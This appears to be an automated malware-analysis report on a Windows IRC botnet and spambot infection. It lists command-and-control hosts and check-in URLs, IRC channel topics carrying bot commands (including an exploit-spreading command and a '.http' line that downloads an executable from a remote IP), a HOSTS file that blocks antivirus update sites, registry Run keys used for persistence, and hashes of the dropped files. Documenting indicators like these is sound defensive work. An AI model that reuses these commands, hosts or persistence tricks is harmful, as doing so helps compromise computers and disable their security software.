ms4all.twoplayers.net

Remote Host Port Number
112.78.112.208 80
218.5.74.190 80
91.212.127.147 80
204.45.85.210 57221
54.59.85ae.static.theplanet.com 25
209.85.97.106 25
65.55.92.152 25
66.94.237.64 25
70.87.6.99 25

MODE #! -ix
MODE #Ma -ix
USER SP2-285 * 0 :COMPUTERNAME
MODE [N00_USA_XP_0571683]
@ -ix
MODE #dpi -ix

channel: #dpi and #!
idle87 changes topic to ‘.asc -S|.asc exp_all 25 2 0 -a -r|.asc exp_all 25 2 0 -b -r|.asc exp_all 25 2 0 -c’
idle87 changes topic to ‘finito’
Now talking in #!
Topic is ‘.asc -S|.http http://208.53.183.181/q.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a’
Set by Master75 on Tue Sep 14 03:07:05

ms4all.twoplayers.net:57221
ms4all.twoplayers.net ip: 109.196.130.66
ms4all.twoplayers.net ip: 204.45.85.218
ms4all.twoplayers.net ip: 204.45.85.210
ms4all.twoplayers.net ip: 109.196.130.50

* The data identified by the following URLs was then requested from the remote web server:
o http://www.nippon.to/cgi-bin/prxjdg.cgi
o http://www.cooleasy.com/cgi-bin/prxjdg.cgi
o http://91.212.127.147/spm/s_get_host.php?ver=522
o http://91.212.127.147/spm/s_alive.php?id=52254925877753275147561242452062&tick=111656&ver=522&smtp=ok&sl=1&fw=0&pn=0&psr=0
o http://91.212.127.147/spm/s_task.php?id=52254925877753275147561242452062

The HOSTS file was updated with the following URL-to-IP mappings:
127.0.0.1 updates.symantec.com
127.0.0.1 file.ikaka.com
127.0.0.1 forum.ikaka.com
127.0.0.1 sophos5.ucd.ie
127.0.0.1 download629.avast.com
127.0.0.1 dnl-kr1.kaspersky-labs.com
127.0.0.1 files.trendmicro-europe.com
127.0.0.1 forum.jiangmin.com
127.0.0.1 gangbang.mytijn.org
127.0.0.1 download950.avast.com
127.0.0.1 www.downloads-us2.kaspersky-labs.com
127.0.0.1 dnl-eu15.kaspersky-labs.com
127.0.0.1 download674.avast.com
127.0.0.1 download516.avast.com
127.0.0.1 pccreg.trendmicro.com
127.0.0.1 download912.avast.com
127.0.0.1 u34.eset.com
127.0.0.1 grisoft.com
127.0.0.1 fortinet.com
127.0.0.1 u42.eset.com
127.0.0.1 download671.avast.com
127.0.0.1 download.norman.no
127.0.0.1 u10.eset.com
127.0.0.1 ftp.updates2.kaspersky-labs.com
127.0.0.1 download948.avast.com
127.0.0.1 fr.bitdefender.com

Other details

* The following ports were open in the system:

Port Protocol Process
1057 TCP msvmiode.exe (%System%\msvmiode.exe)
1080 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
1085 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
2943 TCP msvmiode.exe (%System%\msvmiode.exe)
2944 TCP msvmiode.exe (%System%\msvmiode.exe)
2945 TCP msvmiode.exe (%System%\msvmiode.exe)
2946 TCP msvmiode.exe (%System%\msvmiode.exe)
2947 TCP msvmiode.exe (%System%\msvmiode.exe)
2948 TCP msvmiode.exe (%System%\msvmiode.exe)
2950 TCP msvmiode.exe (%System%\msvmiode.exe)
2951 TCP msvmiode.exe (%System%\msvmiode.exe)
2952 TCP msvmiode.exe (%System%\msvmiode.exe)
2953 TCP msvmiode.exe (%System%\msvmiode.exe)
2954 TCP msvmiode.exe (%System%\msvmiode.exe)
2955 TCP msvmiode.exe (%System%\msvmiode.exe)
2956 TCP msvmiode.exe (%System%\msvmiode.exe)
2957 TCP msvmiode.exe (%System%\msvmiode.exe)
2958 TCP msvmiode.exe (%System%\msvmiode.exe)
2959 TCP msvmiode.exe (%System%\msvmiode.exe)
2960 TCP msvmiode.exe (%System%\msvmiode.exe)
2961 TCP msvmiode.exe (%System%\msvmiode.exe)
2962 TCP msvmiode.exe (%System%\msvmiode.exe)
2963 TCP msvmiode.exe (%System%\msvmiode.exe)
2964 TCP msvmiode.exe (%System%\msvmiode.exe)
2965 TCP msvmiode.exe (%System%\msvmiode.exe)
2966 TCP msvmiode.exe (%System%\msvmiode.exe)
2967 TCP msvmiode.exe (%System%\msvmiode.exe)
2968 TCP msvmiode.exe (%System%\msvmiode.exe)
2969 TCP msvmiode.exe (%System%\msvmiode.exe)
2970 TCP msvmiode.exe (%System%\msvmiode.exe)
2971 TCP msvmiode.exe (%System%\msvmiode.exe)
2972 TCP msvmiode.exe (%System%\msvmiode.exe)
2973 TCP msvmiode.exe (%System%\msvmiode.exe)
2974 TCP msvmiode.exe (%System%\msvmiode.exe)
2975 TCP msvmiode.exe (%System%\msvmiode.exe)
2976 TCP msvmiode.exe (%System%\msvmiode.exe)
2977 TCP msvmiode.exe (%System%\msvmiode.exe)
2978 TCP msvmiode.exe (%System%\msvmiode.exe)
2979 TCP msvmiode.exe (%System%\msvmiode.exe)
2980 TCP msvmiode.exe (%System%\msvmiode.exe)
2981 TCP msvmiode.exe (%System%\msvmiode.exe)
2982 TCP msvmiode.exe (%System%\msvmiode.exe)
2983 TCP msvmiode.exe (%System%\msvmiode.exe)
2984 TCP msvmiode.exe (%System%\msvmiode.exe)
2985 TCP msvmiode.exe (%System%\msvmiode.exe)
2986 TCP msvmiode.exe (%System%\msvmiode.exe)
2987 TCP msvmiode.exe (%System%\msvmiode.exe)
2988 TCP msvmiode.exe (%System%\msvmiode.exe)
2989 TCP msvmiode.exe (%System%\msvmiode.exe)
2990 TCP msvmiode.exe (%System%\msvmiode.exe)
2991 TCP msvmiode.exe (%System%\msvmiode.exe)
2992 TCP msvmiode.exe (%System%\msvmiode.exe)
2993 TCP msvmiode.exe (%System%\msvmiode.exe)
2994 TCP msvmiode.exe (%System%\msvmiode.exe)
2995 TCP msvmiode.exe (%System%\msvmiode.exe)
2996 TCP msvmiode.exe (%System%\msvmiode.exe)
2997 TCP msvmiode.exe (%System%\msvmiode.exe)
2998 TCP msvmiode.exe (%System%\msvmiode.exe)
2999 TCP msvmiode.exe (%System%\msvmiode.exe)
3000 TCP msvmiode.exe (%System%\msvmiode.exe)
3001 TCP msvmiode.exe (%System%\msvmiode.exe)
3002 TCP msvmiode.exe (%System%\msvmiode.exe)
3003 TCP msvmiode.exe (%System%\msvmiode.exe)
3004 TCP msvmiode.exe (%System%\msvmiode.exe)
3005 TCP msvmiode.exe (%System%\msvmiode.exe)
3006 TCP msvmiode.exe (%System%\msvmiode.exe)
3007 TCP msvmiode.exe (%System%\msvmiode.exe)
3008 TCP msvmiode.exe (%System%\msvmiode.exe)
3009 TCP msvmiode.exe (%System%\msvmiode.exe)
3010 TCP msvmiode.exe (%System%\msvmiode.exe)
3011 TCP msvmiode.exe (%System%\msvmiode.exe)
3012 TCP msvmiode.exe (%System%\msvmiode.exe)
3013 TCP msvmiode.exe (%System%\msvmiode.exe)
3014 TCP msvmiode.exe (%System%\msvmiode.exe)
3015 TCP msvmiode.exe (%System%\msvmiode.exe)
3016 TCP msvmiode.exe (%System%\msvmiode.exe)
3017 TCP msvmiode.exe (%System%\msvmiode.exe)
3018 TCP msvmiode.exe (%System%\msvmiode.exe)
3085 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
3086 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
3087 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
3088 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
3089 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
3090 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
3091 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
3092 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
3093 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
3094 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
3095 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
3096 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
3097 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
3098 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
3099 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
3100 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
3101 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
3102 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
3103 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
3104 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
3105 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)
3106 TCP cfdrive32.exe (%Windir%\cfdrive32.exe)

Registry Modifications

* The following Registry Keys were created:
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
+ Microsoft Driver Setup = “%Windir%\cfdrive32.exe”

so that cfdrive32.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+ MSODESNV7 = “%System%\msvmiode.exe”
+ 404 = “%System%\syscache.exe”
+ Microsoft Driver Setup = “%Windir%\cfdrive32.exe”

so that msvmiode.exe runs every time Windows starts
so that syscache.exe runs every time Windows starts
so that cfdrive32.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
+ ridt100413 = “1”
+ id = “52254925877753275147561242452062”
+ host = “91.212.127.147”
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
+ Taskman = “%AppData%\ltzqai.exe”

so that ltzqai.exe runs every time Windows starts

Memory Modifications

* There were new processes created in the system:

Process Name | Process Filename | Main Module Size
msvmiode.exe | %System%\msvmiode.exe | 159 744 bytes
syscache.exe | %System%\syscache.exe | 90 112 bytes
cfdrive32.exe | %Windir%\cfdrive32.exe | 339 968 bytes
1673.exe | %Temp%\1673.exe | 339 968 bytes

File System Modifications

* The following files were created in the system:

# | Filename(s) | File Size | File Hash
1 | %AppData%\ltzqai.exe
    [file and pathname of the sample #1] | 82 944 bytes | MD5: 0xBC8E5825758377A7432F06E6F15D58D4
    SHA-1: 0xD0049C238CF7B85BE8AF55E8F867AE5A5B085B5F
2 | %Temp%\1673.exe
    %Windir%\cfdrive32.exe | 86 016 bytes | MD5: 0x45565C90B2BBFEFE87ADFAA87C91C146
    SHA-1: 0xEAF2457938A75890E3FE2A22F00BED496391DB2E
3 | %Temp%\3274511.exe
    %System%\msvmiode.exe | 176 128 bytes | MD5: 0x0FCC186B3038175648C202BE60914361
    SHA-1: 0xF5065F59416A6BA6A09B6A3020E54D0BD3AC22E1
4 | %Temp%\404.exe
    %System%\syscache.exe | 126 976 bytes | MD5: 0xEFAA4CAD70DB7D08AA32BA670260A0D5
    SHA-1: 0x2E623CED33120C9A8DA76C60C338F9FF493CF1EC
5 | %Windir%\hosts | 250 899 bytes | MD5: 0xF80FF39C364F711504E5635B57591683
    SHA-1: 0x30B5ADC59EF9118DBF63131F689AB6F76A29A96F
6 | %System%\drivers\hosts | 260 529 bytes | MD5: 0x9AA8B68B83B25FCC1AE86D57B31F8A84
    SHA-1: 0x01BDAB11B2CE1157366A9F8441B3E18613649FAA
7 | %System%\hosts | 255 918 bytes | MD5: 0x707E213A57750B8584C8403968F3F6EB
    SHA-1: 0x3F05312A763FE1F5D96E75D7AEA285047B42F927
